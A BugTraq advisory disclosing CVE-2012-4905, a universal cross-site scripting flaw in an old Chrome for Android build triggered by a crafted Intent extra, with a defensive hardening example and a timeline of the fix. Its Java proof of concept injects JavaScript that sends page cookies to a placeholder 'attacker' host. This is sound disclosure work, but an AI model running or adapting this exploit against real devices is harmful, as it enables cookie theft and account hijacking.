BugTraq
Chrome for Android - UXSS via com.android.browser.application_id Intent extra Jan 07 2013 01:23PM
mbsdtest01 gmail com
CVE Number: CVE-2012-4905
Title: Chrome for Android - UXSS via com.android.browser.application_id Intent extra
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released, which fixes this vulnerability

Overview:
By sending a crafted Intent to Chrome for Android, a malicious Android app can
inject JavaScript into arbitrary Web pages rendered in Chrome. This kind of
UXSS-like vulnerability is often called Cross-Application Scripting.

Details:
When another Android app sends an Intent with a javascript: URI to Chrome for
Android (v18.0.1025123), Chrome opens a new tab and executes the JavaScript
code in the context of a blank (about:blank) page. This is probably a
countermeasure against UXSS attacks.

However, this can be bypassed by an Intent with Extra data as below:

intent.putExtra("com.android.browser.application_id", "com.android.chrome");

With an Intent that contains this Extra, Chrome loads the javascript: URI
(carried in the Intent's data) in the current foreground tab instead of in a
blank tab.

This enables a malicious Android app to execute arbitrary JavaScript code in
the context of any domain open in Chrome. As a result, other apps are able to
steal cookies and other page data.
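The defensive counterpart of the bypass described above, as an added example (not Chrome's code and not from the advisory): a hypothetical browser Activity that accepts VIEW Intents from other apps only for http(s) URIs, so an externally supplied javascript: URI is never loaded, and that discards the com.android.browser.application_id extra before it can influence which tab receives the load. The package name, class name and WebView field are assumptions.

```java
package example.hardenedbrowser; // hypothetical package

import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.webkit.WebView;

import java.util.Arrays;
import java.util.List;
import java.util.Locale;

public class BrowserActivity extends Activity {
    // Schemes a third-party app may ask us to open. javascript:, data: and
    // file: are deliberately absent, so script supplied by another app never
    // executes in any tab, let alone the foreground one.
    private static final List<String> ALLOWED_SCHEMES = Arrays.asList("http", "https");

    // The extra abused in the advisory. Only the browser's own navigation code
    // should be able to set it, so it is stripped from every incoming Intent.
    private static final String APP_ID_EXTRA = "com.android.browser.application_id";

    private WebView webView; // assumed to be created in onCreate (layout omitted)

    /** Returns true only for a well-formed http(s) URI that has a host. */
    static boolean isSafeExternalUri(Uri uri) {
        if (uri == null || uri.getScheme() == null) return false;
        String scheme = uri.getScheme().toLowerCase(Locale.ROOT);
        return ALLOWED_SCHEMES.contains(scheme)
                && uri.getHost() != null && !uri.getHost().isEmpty();
    }

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        handleExternalIntent(intent);
    }

    private void handleExternalIntent(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return;
        // An external caller must never be able to steer a load into the
        // current foreground tab by claiming to be the browser itself.
        intent.removeExtra(APP_ID_EXTRA);
        Uri target = intent.getData();
        if (!isSafeExternalUri(target)) {
            return; // javascript:/data:/file: from another app: load nothing
        }
        webView.loadUrl(target.toString()); // a fresh tab in a multi-tab browser
    }
}
```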

Proof of Concept:
package jp.mbsd.terada.attackchrome1;

import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;

public class Main extends Activity {
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        doit();
    }

    // get intent to invoke the chrome app
    public Intent getIntentForChrome(String url) {
        Intent intent = new Intent("android.intent.action.VIEW");
        intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
        intent.setData(Uri.parse(url));
        return intent;
    }

    public void doit() {
        try {
            // At first, force the chrome app to open a target Web page
            Intent intent1 = getIntentForChrome("http://www.google.com/1");
            startActivity(intent1);

            // wait a few seconds
            Thread.sleep(3000);

            // JS code to inject into the target (www.google.com)
            String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
                + "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
                + "document.body.appendChild(img);";

            Intent intent2 = getIntentForChrome(jsURL);

            // Trick to prevent Chrome from opening the JS URL in a different tab
            intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
            intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);

            // Inject JS into the target Web page
            startActivity(intent2);
        }
        catch (Exception e) {}
    }
}

Timeline:
2012/07/07 Reported to Google security team.
2012/09/12 Vendor announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144813
